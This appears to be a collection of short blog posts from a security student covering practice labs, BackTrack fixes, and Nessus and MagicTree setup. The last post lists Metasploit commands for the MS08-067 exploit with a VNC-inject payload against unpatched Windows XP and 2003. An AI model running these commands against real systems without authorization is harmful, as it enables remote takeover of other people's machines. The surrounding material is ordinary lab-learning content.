Microsoft Office 2010 New Product Key

These are the steps to follow if there is a necessity to change the Microsoft Office 2010 Product Key

Control Panel >> Add or Remove Programs >> Microsoft Office 2010 >> Change >> Enter New Product Key

Metasploit Training

Here’s a link to Metasploit Training from a community of Security Experts.

 

PenTesting Web Sites

WEB
– WebGoat, (https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project)
– Gruyere (antigo Codelab), (http://google-gruyere.appspot.com/)
– DVWA (Damn Vulnerable Web App), (http://www.dvwa.co.uk/)
– Hacme, (http://hacmegame.org/)
– Multilidae, (http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10)
. War Games
– Hack This Site (http://www.hackthissite.org/)
– Over the Wire (http://www.overthewire.org/wargames/)
. Insecure Distributions
– Metasploitable, (http://blog.metasploit.com/2010/05/introducing-metasploitable.html)
– de-ICE, (http://de-ice.net/hackerpedia/index.php/De-ICE.net_PenTest_Disks)
– Moth (Bonsai Security Software), (http://www.bonsai-sec.com/en/research/moth.php)
– PwnOS, (http://www.neildickson.com/os/)
– DVL, (http://www.damnvulnerablelinux.org/)

Protected: A+ Solutions

This content is password protected. To view it please enter your password below:

BackTrack: Unable to locate ioapic

Today I tried to start BackTrack4r2 on a Dell Optiplex 755, but kept getting the error:

 

unable to locate ioapic at GSx

 

After a little research I found out that the video drivers weren’t supported. I needed to type “fixvesa” at the prompt, then “startx”.

That did the trick.

 

Here’s the article

Protected: Network+ Answers

This content is password protected. To view it please enter your password below:

Information Security Reports

McAffee’s Underground Economy:¬†Intellectual Capital and Sensitive Corporate Data Now the Latest¬†Cybercrime Currency

Underground Economies

MagicTree – A PenTester Productivity Tool

MagicTree is a penetration tester productivity tool. It is designed to allow easy and straightforward data consolidation, querying, external command execution and report generation. In case you wonder, “Tree” is because all the data is stored in a tree structure, and “Magic” is because it is designed to magically do the most cumbersome and boring part of penetration testing – data management and reporting.

 

cd /.
java -jar MagicTree01300.jar

 

http://linuxpoison.blogspot.com/2011/02/penetration-testing-data-management-and.html

Install Nessus on BackTrack

First we need to download Nessus and NessusClient Ubuntu 8.10 packages fromhttp://nessus.org/download/.

Packages:
Nessus-4.0.0-ubuntu810_i386.deb
NessusClient-4.0.0-ubuntu810_i386.deb

Install the Nessus Packages:

root@bt:~# dpkg -i Nessus-4.0.0-ubuntu810_i386.deb
Installing NessusClient is more complicated than installing Nessus Server so we need to download and install some dependencies first.
root@bt:~# apt-get install libqt4-core libqt4-gui libqtcore4 libqt4-network libqt4-script libqt4-xml libqt4-dbus libqt4-test libqtgui4 libqt4-svg libqt4-opengl libqt4-designer libqt4-assistant
root@bt:~# dpkg -i NessusClient-4.0.0-ubuntu810_i386.deb

Now we need to configure Nessus Server:

Make the certificates
/opt/nessus/sbin/nessus-mkcert

Register the scanner here.
/opt/nessus/bin/nessus-fetch –register XXXX-XXXX-XXXX-XXXX-XXXX

Create a Nessus User
/opt/nessus/sbin/nessus-adduser

Start Nessus Server
/etc/init.d/nessusd start

Start Nessus Client
Backtrack -> Internet -> NessusClient or from CLI: /opt/nessus/bin/NessusClient

VNCInject on XPSP2, XPSP3 & 2003

I used Metasploit to exploit the vulnerability in unpatched versions of XPSP2, XPSP3 and 2003. And this is how I did it:

  1. msfconsole
  2. use exploit/windows/smb/ms08_067_netapi
  3. show Options
  4. set Rhost <target computer IP>
  5. set payload windows/vncinject/bind_tcp
  6. exploit